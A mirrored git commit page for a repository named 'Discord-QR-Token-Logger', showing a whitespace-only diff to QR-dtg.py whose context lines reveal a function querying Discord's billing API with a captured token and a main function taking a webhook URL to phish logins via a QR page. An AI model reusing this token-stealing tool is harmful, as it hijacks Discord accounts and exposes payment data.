mirror of
https://github.com/9P9/Discord-QR-Token-Logger.git
synced 2025-04-19 14:45:25 +00:00
Update QR-dtg.py
This commit is contained in:
parent
3df6f34d24
commit
3bf972cebe
@ -46,8 +46,7 @@ def get_discord_info(tk, link_int):
|
||||
elif link_int == 2:
|
||||
response = get('https://discordapp.com/api/v9/users/@me/billing/subscriptions', headers=headers).json()
|
||||
return response
|
||||
|
||||
|
||||
|
||||
def main(webhook_url) -> None:
|
||||
"""Use selenium webdriver to go to the discord login page.
|
||||
Then, grab the source of the page and use regex to identify the class
|
||||
|
Loading…
x
Reference in New Issue
Block a user